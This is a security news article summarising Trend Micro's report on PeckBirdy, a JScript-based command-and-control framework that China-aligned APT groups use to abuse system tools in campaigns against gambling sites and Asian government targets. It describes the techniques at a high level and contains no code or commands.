PeckBirdy: JScript-Based Framework Lets China-Aligned APTs Exploit LOLBins for Stealthy Operations
Trend Micro reveals PeckBirdy, a JScript-based C2 framework used by China-aligned APT groups since 2023 to abuse legitimate system tools for stealthy attacks on gambling and government targets.
Since 2023, China-aligned advanced persistent threat (APT) groups have been leveraging a previously undocumented script-based command-and-control framework dubbed PeckBirdy, according to a detailed report published by Trend Micro on January 26, 2026. The framework, implemented in the legacy JScript language, is designed to execute across multiple environments by abusing living-off-the-land binaries (LOLBins), enabling attackers to maintain stealthy persistence and evade traditional detection mechanisms. Trend Micro researchers identified at least two campaigns employing PeckBirdy, targeting Chinese gambling industries as well as Asian government entities and private organizations.
PeckBirdy's versatility stems from its ability to run in browsers, MSHTA, WScript, Classic ASP, Node.js, and .NET environments via ScriptControl. Depending on the execution context, the framework's capabilities shift: in a browser, it operates within the sandboxed scope of a webpage, while in environments like MSHTA, it can execute arbitrary actions directly on the local machine. The framework uses a set of defined APIs to deliver landing scripts tailored to each execution environment, with embedded configuration parameters controlling host, port, attack ID, retry logic, and heartbeat intervals.
The first campaign, tracked as SHADOW-VOID-044, began in 2023 and involved injecting malicious scripts into Chinese gambling websites. When victims visited these sites, the scripts downloaded and executed PeckBirdy's main routine, which displayed fake Google Chrome update pages to trick users into downloading backdoors. The second campaign, SHADOW-EARTH-045, observed from July 2024, targeted Asian government entities and private organizations by injecting PeckBirdy links into government websites, likely for credential harvesting. In one case, the injection was on a government login page; in another, the attacker used MSHTA to execute PeckBirdy as a remote access channel for lateral movement within a private organization.
Beyond its core functionality, PeckBirdy is extended by two modular backdoors: HOLODONUT and MKDOOR. These backdoors enhance the framework's attack capabilities, allowing for more sophisticated payload delivery and persistent access. The SHADOW-VOID-044 campaign also leveraged stolen code-signing certificates, Cobalt Strike payloads, and exploitation of CVE-2020-16040, a Chrome vulnerability, hosted across multiple C2 domains and IP addresses to maintain access.
Trend Micro's TrendAI Vision One platform detects and blocks the indicators of compromise associated with PeckBirdy, providing customers with tailored threat hunting queries and intelligence reports. The researchers noted that the use of JScript—an old, widely available scripting language—ensures the framework can be launched across diverse environments without requiring additional dependencies, making it a flexible tool for APT operations. The findings were initially presented at the HitCon conference in August 2025 and are now being shared publicly to raise awareness.
The emergence of PeckBirdy underscores the ongoing evolution of China-aligned threat actor tactics, particularly their reliance on LOLBins and script-based frameworks to evade detection. By abusing legitimate system tools, these groups can operate under the radar of traditional security solutions, emphasizing the need for advanced behavioral detection and threat hunting capabilities. As the framework continues to be used in active campaigns, organizations in the gambling and government sectors should remain vigilant and implement robust monitoring for anomalous script execution.